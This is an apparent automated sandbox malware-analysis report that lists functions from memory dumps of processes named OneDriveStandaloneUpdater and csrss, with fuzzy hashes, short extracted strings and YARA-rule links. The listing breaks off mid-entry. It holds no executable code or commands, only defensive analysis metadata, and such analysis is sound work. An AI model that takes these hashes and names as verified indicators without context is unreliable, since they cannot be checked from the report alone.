Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 542ddd057de4ac4ae0f50f3a690d2fc6bfa6907570065d587ee8ff01ccddb86a
Instruction ID: 523bd68557fd3d486e56c4e8b212096ea0dfe3761c4865604a7161452780e8c2
Opcode Fuzzy Hash: 542ddd057de4ac4ae0f50f3a690d2fc6bfa6907570065d587ee8ff01ccddb86a
Instruction Fuzzy Hash: E9318E319096198FEB51EB78C449AE9BBF0FF19304F148476D40EE3191DA38E884CB90

Function 00007FFAAC472488 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b34a1aec779ed0c38dc5fe3f776db43cfb0533e46a121bdc78f039103cb87f5b
Instruction ID: 74a59b21b6e6211402f9591af4049638325ff93f297b31de395bdef2fb4d6674
Opcode Fuzzy Hash: b34a1aec779ed0c38dc5fe3f776db43cfb0533e46a121bdc78f039103cb87f5b
Instruction Fuzzy Hash: 5221F571F1891D8BEB94EB6CD80A6FDB3E1EB98321F14417BE40ED3285DD28A84547D1

Function 00007FFAAC4709C1 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ae1262ba3a34b2e5f0a43b93c16322cc6d7b4d50d19d0e1bcef093131d391d1
Instruction ID: 681d224111aa9a341ea3d8f03409a2cd3dcd984739276fd749a2f6f00701e33b
Opcode Fuzzy Hash: 7ae1262ba3a34b2e5f0a43b93c16322cc6d7b4d50d19d0e1bcef093131d391d1
Instruction Fuzzy Hash: F411C052A0FA6B4FFA94A768582D6B62EC1DFA6215F04817BD80EC2197DD08E80943C8

Function 00007FFAAC47089D Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6771e2614e0d51cf6485b9367a243ecaea6360b666310057560e0216e4b93e79
Instruction ID: de8a6643d4fa6cd2f17250c44729d08d1e2d2fcdc141eba686f70eee9d222fa4
Opcode Fuzzy Hash: 6771e2614e0d51cf6485b9367a243ecaea6360b666310057560e0216e4b93e79
Instruction Fuzzy Hash: A1115C7150EB888FE785E72884581BA7FE0EF96324F4445BFE04EC3192DE28D84A87C1

Function 00007FFAAC474EB1 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45e495816cf41e52c6ccd26d944f6b93d6bda96de8c642bf5311b9be7b5db240
Instruction ID: 1b4ea833c82c5abc6853ac76aeeeecc20c1180181c289ae8cc5011f647ecf0ab
Opcode Fuzzy Hash: 45e495816cf41e52c6ccd26d944f6b93d6bda96de8c642bf5311b9be7b5db240
Instruction Fuzzy Hash: 4411E26184F3C54FE70283746C298F27FB4AF03229B0981E7D488CB0A3C50D595AC7A2

Function 00007FFAAC4709E0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89e1dc2efe08eefcb5401a3db14d7b1187c1096eba9c469374d255b7b8360915
Instruction ID: 156a7575f5c1e00a31032121adbd34e349a9ca1ffa91aaf3851c8c8876f8bffb
Opcode Fuzzy Hash: 89e1dc2efe08eefcb5401a3db14d7b1187c1096eba9c469374d255b7b8360915
Instruction Fuzzy Hash: 9101D852F0FD1F4BB6E4675D285D6762AC5DFE6754F50823B980EC2186DC08EC4A42C4

Function 00007FFAAC470E39 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f02d7a8f1051606876bf8bacbe1eedef3f1a8471cacf34421f39b6d679a00b
Instruction ID: fafe5b09a8f0dd8d0e98e031b0aa1fd83effebb4ed6982d6559deb13a5d7ef87
Opcode Fuzzy Hash: 89f02d7a8f1051606876bf8bacbe1eedef3f1a8471cacf34421f39b6d679a00b
Instruction Fuzzy Hash: 5A11C82160F6C44FE347A33CA89D6B47FD1AF87215B0941F6E04CCB1B3D998484AC342

Function 00007FFAAC474F11 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5651037fcae1d896373455280cd59902ab10553f7e25159ede349ef5fc35bea7
Instruction ID: 3b18fad42c663e0accc0f47b73e263417d6138e68f9d48d28d01cd43fea93072
Opcode Fuzzy Hash: 5651037fcae1d896373455280cd59902ab10553f7e25159ede349ef5fc35bea7
Instruction Fuzzy Hash: AB014961A0E2924BF31A633895693F82B519F83328F0591F9D04ECA1D3CC1DA89A83D5

Function 00007FFAAC474064 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c99bfd8b054ba68b0bfbafc17bd3f19ffa6aee5723edbce5ecf4336317bcffa4
Instruction ID: 0d30179e29fd69307cdb4746af97e4889bed6aed84fc1c7ac823260fd1baef81
Opcode Fuzzy Hash: c99bfd8b054ba68b0bfbafc17bd3f19ffa6aee5723edbce5ecf4336317bcffa4
Instruction Fuzzy Hash: F8F02D93F0995A8FF794A76C545D5BC67E1EB59224B64603AD14EC3182DC189C0A07C1

Function 00007FFAAC47518D Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f75a527190bdac719202e6f5465787cecbf3654927b5a3fe4703494d367690b
Instruction ID: 1939d830d341157183e52c3f4f334d38ded226217bb600f1e17c97f6f0f8f155
Opcode Fuzzy Hash: 5f75a527190bdac719202e6f5465787cecbf3654927b5a3fe4703494d367690b
Instruction Fuzzy Hash: F8F0DC31F0942E8BEF84EB9C98491FE73A1EB88325B144075D40EE7281DE28A90687D0

Function 00007FFAAC470DF6 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7a1ddd03bc792162b02cf5e72e12bcaafc4c8760bdb70db6e4d9105fdc9ebda
Instruction ID: ae935fa9d06b13f1ed8934158dfb1b1a150f1bfbfadf73846838d3730f174b73
Opcode Fuzzy Hash: f7a1ddd03bc792162b02cf5e72e12bcaafc4c8760bdb70db6e4d9105fdc9ebda
Instruction Fuzzy Hash: 74E02B7290E64C6FBB08AA59FC0BCF67F98DA87238B00015FF15EC2153E112A4638296

Function 00007FFAAC473C81 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f78cbcf8e22088403c1cb38a5bcac98fc4e397b282bdc2a7c7de84f87f03673
Instruction ID: 7e39d33f0d594b2f3b62227dc58333fdae800acdb74a1fce58c912c085773f62
Opcode Fuzzy Hash: 6f78cbcf8e22088403c1cb38a5bcac98fc4e397b282bdc2a7c7de84f87f03673
Instruction Fuzzy Hash: 4BE0DF368ADA1C9FEB64AB5DBC086D876A1FB89318F0002A9E40CC7181D7259659C746

Function 00007FFAAC474D65 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c166fc929ad40b6d148a55ea4f5ac28eac877686117712464b458536cafa2ac4
Instruction ID: 1e0fe2f483d2ca03ae5c46c32fe3afaabf2c5d58fc769df42fca7107a671e69f
Opcode Fuzzy Hash: c166fc929ad40b6d148a55ea4f5ac28eac877686117712464b458536cafa2ac4
Instruction Fuzzy Hash: 17E0263285DA1DCBEB88EB999C482F937E4FF4A30CF0101A9E04CC3181DB359955CB8A

Function 00007FFAAC470CC0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b11db8d9618d4f591a0e245b384cd13b510080f59676afac58303d9d50b536
Instruction ID: e4f736d6d11eee08a8323d54cecbcb78701db8c8b66dc7991e089f2afe1a774f
Opcode Fuzzy Hash: a4b11db8d9618d4f591a0e245b384cd13b510080f59676afac58303d9d50b536
Instruction Fuzzy Hash: 8CC02B13BCE90E099E006068FC40CE1F380C7401303504A33C80BC1008DC1B94C10340

Non-executed Functions

Function 00007FFAAC4745AA Relevance: 5.2, Strings: 4, Instructions: 173COMMON

Download Yara Rule

Strings

(0, xrefs: 00007FFAAC474621
r6, xrefs: 00007FFAAC4745AE
H, xrefs: 00007FFAAC47462C
(0, xrefs: 00007FFAAC474638

Memory Dump Source

Source File: 00000028.00000002.1786671402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffaac470000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID: (0$(0$H$r6
API String ID: 0-147897198
Opcode ID: 50a9f7d8146a758943a34066b8dd55774f60b34f1645611f0b9a78817183e46f
Instruction ID: f0b0c7f057886dfab2457c53bb3831d95c9419dd4e86d9b064c2cd7557d6878c
Opcode Fuzzy Hash: 50a9f7d8146a758943a34066b8dd55774f60b34f1645611f0b9a78817183e46f
Instruction Fuzzy Hash: AC419451B19D4E4BEFCCDB6C9499AB533C1EBA831571092BAD80EC729BDD28DC068784

Analysis Process: csrss.exePID: 2376, Parent PID: 4056COMMON

Execution Graph

Execution Coverage:	15.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	30
Total number of Limit Nodes:	3

Executed Functions

Function 00007FFAAC5DC27D Relevance: 2.3, Strings: 1, Instructions: 1020COMMON

Download Yara Rule

Strings

Y7_H, xrefs: 00007FFAAC5DCB6D

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: Y7_H
API String ID: 0-4081181720
Opcode ID: 939efdbdde8b5bd7c5d068dda7294a139c58dad178c2c9d01db1475671d0b1bf
Instruction ID: a9e14d22f7b7465578cbd60280c15cf423a7893e0abf472b1ee81a6f35171717
Opcode Fuzzy Hash: 939efdbdde8b5bd7c5d068dda7294a139c58dad178c2c9d01db1475671d0b1bf
Instruction Fuzzy Hash: 9362036195D7468BF3A6E7388406AB977D4EF97310F0484BAE44EC7293DD28F84A87C1

Function 00007FFAAC46C350 Relevance: 2.2, Instructions: 2241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC46C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac46c000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b179e602debc6c8cb33e0e9913d35c9c25a2b4f156f5804f6edda87797ef2352
Instruction ID: 7ec68d963bf1d06a2bbf4e0b9cb6f79b36d52d715159b03786158e680692f81d
Opcode Fuzzy Hash: b179e602debc6c8cb33e0e9913d35c9c25a2b4f156f5804f6edda87797ef2352
Instruction Fuzzy Hash: 1603E170A0852C8FDB99DF18C499BA9B7F1FB58304F20C1AED00EE3795CA759986CB44

Function 00007FFAAC46C425 Relevance: .5, Instructions: 470COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC46C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac46c000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc34d2acdf459f1c85bb782487ba804fe68fd7955abec275e4d0ba7f4c38db6a
Instruction ID: 404c06a73482f7748006cbc5c8a86e5592e35986e4921778e0550f28cecba8c9
Opcode Fuzzy Hash: dc34d2acdf459f1c85bb782487ba804fe68fd7955abec275e4d0ba7f4c38db6a
Instruction Fuzzy Hash: B0E1677190D7558BF36D8B18D4593B677D0EB92328F24D17ED0DF83692CE28A80A87C9

Function 00007FFAAC5D8AB2 Relevance: 4.0, Strings: 3, Instructions: 292
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC5D8E12
r6, xrefs: 00007FFAAC5D8B13
r6, xrefs: 00007FFAAC5D8B63

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6$r6$r6
API String ID: 0-701349563
Opcode ID: 872b90bea99bf3d269474a86ab12aed112eef40704d251f23dae26e5f6d0a65d
Instruction ID: 972fecfdf3aaeb53bf8aebafa3e583ccb3c921322ea5ff04cd17a0f315c6aebd
Opcode Fuzzy Hash: 872b90bea99bf3d269474a86ab12aed112eef40704d251f23dae26e5f6d0a65d
Instruction Fuzzy Hash: 08B18E7050AA47CBE74EDB68C0907A4B7E5FF59300F5481BAD04EC7A96CB28F8558BD0

Function 00007FFAAC5D91FF Relevance: 2.9, Strings: 2, Instructions: 437
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

b4, xrefs: 00007FFAAC5D9692
r6, xrefs: 00007FFAAC5D96F2

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: b4$r6
API String ID: 0-544269225
Opcode ID: c1854ee411e9acfa38b5d812c1b62cafcaeb130c75393e61067126f288cfeaaf
Instruction ID: 7362317b16746813cbce07accccb41f65d124e3fd0e1f1b1653e5cb0ba490af3
Opcode Fuzzy Hash: c1854ee411e9acfa38b5d812c1b62cafcaeb130c75393e61067126f288cfeaaf
Instruction Fuzzy Hash: BAF1C070519646CFEB49CF18C4D46B43BA5FF46300F5481BEE84E8B68BDA38E885CB81

Function 00007FFAAC5D3BF5 Relevance: 2.8, Strings: 2, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC5D3EE2
r6, xrefs: 00007FFAAC5D3C33

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: 35bb09c02876a2060b0a03c9fd2b9f5647cd20a2f2b0628ff33a68e409f6f2c8
Instruction ID: 670c2a302572b189cd4b3aedf301558434cf1f729b96cb57b6fb906ca238491a
Opcode Fuzzy Hash: 35bb09c02876a2060b0a03c9fd2b9f5647cd20a2f2b0628ff33a68e409f6f2c8
Instruction Fuzzy Hash: B7918F70549A478FE74ADB28C0917A4BBA1FF56300F54817AE44EC7AC6DB28F855CBD0

Function 00007FFAAC4CFEFA Relevance: 2.8, Strings: 2, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC4D0202
r6, xrefs: 00007FFAAC4CFF53

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: 8eb849d0b4e8d3c8e4f1fd908320e1d4a7c118d519c158554a484d07b9fe5444
Instruction ID: e876fa4a9279d2e3338e294140f6e119377e7167cc97c3cbcc604864505a7030
Opcode Fuzzy Hash: 8eb849d0b4e8d3c8e4f1fd908320e1d4a7c118d519c158554a484d07b9fe5444
Instruction Fuzzy Hash: 9A91C53050DA468FF74AEB24C0946A4BBA1FF56304F5481BAC44ECBA97DB28F855C7D4

Function 00007FFAAC5D8F88 Relevance: 2.7, Strings: 2, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFAAC5D9002
r6, xrefs: 00007FFAAC5D8FB7

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: $r6
API String ID: 0-2810495310
Opcode ID: a4a89264dcd31e9a553b0c92d0df06a07b1362823a5e89dc842dbddbe59fbbfe
Instruction ID: 0dede7235311d701a09d0b42f45f7c245ca9d250228cb5e41ffb02b4776ca583
Opcode Fuzzy Hash: a4a89264dcd31e9a553b0c92d0df06a07b1362823a5e89dc842dbddbe59fbbfe
Instruction Fuzzy Hash: 46519D70D4964F8FEB09DB98C8556FDBBB5EF45300F10817AE00ED7282DA34A909CB81

Function 00007FFAAC5D4058 Relevance: 2.7, Strings: 2, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC5D4087
, xrefs: 00007FFAAC5D40D2

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: $r6
API String ID: 0-2810495310
Opcode ID: 11b82c02daece387d5013ab373aedb1a8087b02fa764c93727658211550a293b
Instruction ID: 9a3c6079fbff463c006cd295e4c324dde89d0682d07c156e013fa598b4640c27
Opcode Fuzzy Hash: 11b82c02daece387d5013ab373aedb1a8087b02fa764c93727658211550a293b
Instruction Fuzzy Hash: 75515B70D4964ECBEB49CB98C4556BDBBB1EF55300F10817AE00EE7282CF38A949CB81

Function 00007FFAAC4D0378 Relevance: 2.7, Strings: 2, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC4D03A7
, xrefs: 00007FFAAC4D03F2

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: $r6
API String ID: 0-2810495310
Opcode ID: 6399f16fe1bab62de47dacafbe14df09f431503dd8ab8a9fc44fd6730b11033d
Instruction ID: 074cb5d371640293794e6d23404cd34473b6a51285d30707d92b899f9af3d8cb
Opcode Fuzzy Hash: 6399f16fe1bab62de47dacafbe14df09f431503dd8ab8a9fc44fd6730b11033d
Instruction Fuzzy Hash: 5A516170D0964ACFEB4ADB94C4656BDBBB1FF45304F1081BEC40EE7292CA34A905CB95

Function 00007FFAAC5D2B75 Relevance: 2.6, Strings: 2, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC5D2B76
r6, xrefs: 00007FFAAC5D2BA0

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: 512a233ffa861ebfc851622ca9cbfd7890adca54cc870b94c75d4e166141992a
Instruction ID: 85cb0a4bf278b419d918bef0133defe0632bfdeef2e1e2848dcafa8f157837c2
Opcode Fuzzy Hash: 512a233ffa861ebfc851622ca9cbfd7890adca54cc870b94c75d4e166141992a
Instruction Fuzzy Hash: 7D31D571D5EB4B8BFB99EB6898163A8B7D1FF56300F44417AE04EC3292DD189C0987C1

Function 00007FFAAC5D7A8A Relevance: 2.6, Strings: 2, Instructions: 94COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC5D7AB5
r6, xrefs: 00007FFAAC5D7A8B

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: 158894d4a9064774bbf1b1b39817baa06e3b46f76bb9e85adf0f87d9d8cfc9fe
Instruction ID: 4382f1bac50f298240a5900f2a6b86e10c162a4e040f7f939dd47dc2406265ab
Opcode Fuzzy Hash: 158894d4a9064774bbf1b1b39817baa06e3b46f76bb9e85adf0f87d9d8cfc9fe
Instruction Fuzzy Hash: BD21F771A4DB4ACFF789E76894123E8B7D1FF56354F44427AE00EC3186EE18A80A87C1

Function 00007FFAAC5D79CD Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC5D7A19
r6, xrefs: 00007FFAAC5D79DB

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: 0c83945fb52b40d9ae34907c588bec412499ed3c16f6280b78848a36d9ba3cd8
Instruction ID: fe2dcd57706cc1936602a5ed908da96819e520f6d89b7715e667dae60f7402f7
Opcode Fuzzy Hash: 0c83945fb52b40d9ae34907c588bec412499ed3c16f6280b78848a36d9ba3cd8
Instruction Fuzzy Hash: 45214F71A19A0ACBE798DB5CD491AA8F7A2FF49310B508279D00EC3285DF24FC168BC0

Function 00007FFAAC5D2ABB Relevance: 2.6, Strings: 2, Instructions: 89COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC5D2AC9
r6, xrefs: 00007FFAAC5D2B07

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: d57086ef0c0189df34ed9b6bd0e8afb6799c99c144e2a370fc358485ad32ee48
Instruction ID: cbc701c7dbe9c3d2e3586771af35ff463e685bfd9c426529446f9b40d2a89957
Opcode Fuzzy Hash: d57086ef0c0189df34ed9b6bd0e8afb6799c99c144e2a370fc358485ad32ee48
Instruction Fuzzy Hash: 1C211C71B59A0ACBE799DB58D495A68B3A2FF59310B508279D01ED3282CF24FC568BC0

Function 00007FFAAC46C830 Relevance: 2.6, Strings: 2, Instructions: 60COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFAAC46C83A
r6, xrefs: 00007FFAAC46C88C

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC46C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac46c000_csrss.jbxd

Similarity

API ID:
String ID: r6$/
API String ID: 0-322465848
Opcode ID: ee8d6d349b31a9ea1dc9f9870a7df6ecb175087d948efc4289fa1b92e6550a6f
Instruction ID: 77fdede88341d124d8d3037caeac28f42c7bec3191267d77c549220c13f1e566
Opcode Fuzzy Hash: ee8d6d349b31a9ea1dc9f9870a7df6ecb175087d948efc4289fa1b92e6550a6f
Instruction Fuzzy Hash: 76010892E6DA864BE658A378C81DEE5F3C0FF64200F04827AD40FC3586ED1CA84543C1

Function 00007FFAAC46C41D Relevance: 2.1, Strings: 1, Instructions: 885COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC4C49A5

Memory Dump Source

Source File: 00000029.00000002.2271993437.00007FFAAC46C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac46c000_csrss.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: e6e0a0b3e5ffa7d8a56fcb555c3138daff2ab4f67a9c4e1446571a33dd0b2c84
Instruction ID: 74704acbde96e8210968aff110921f7d894a0b82fe5dc99cbe5af89432ee62b1
Opcode Fuzzy Hash: e6e0a0b3e5ffa7d8a56fcb555c3138daff2ab4f67a9c4e1446571a33dd0b2c84
Instruction Fuzzy Hash: 7D52263090E6858FF76AD728C459A747BE0EF16318F1441BEC08EC75A3DE29E84AC784

Function 00007FFAAC5D42CF Relevance: 1.7, Strings: 1, Instructions: 408COMMON

Download Yara Rule

Strings

b4, xrefs: 00007FFAAC5D4762

Memory Dump Source

Source File: 00000029.00000002.2383720999.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: b4
API String ID: 0-3371602342
Opcode ID: 24a70b24e0a55828dc9d0637c2eaf48a3f16ff2522eb3d319136b161ab8df8c8
Instruction ID: ac40d066ec35efad01b689ccc518da4bdb33fb7ccf186cbb77845a41435b783b
Opcode Fuzzy Hash: 24a70b24e0a55828dc9d0637c2eaf48a3f16ff2522eb3d319136b161ab8df8c8
Instruction Fuzzy Hash: 80E1AE30519646CFEB59CF18C0D16B537A5FF46301B5486BAE84FCB68ADB38E885CB81

Function 00007FFAAC5DAE95 Relevance: 1.6, Strings: 1, Instructions: 394COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC5DAF06

Memory Dump Source

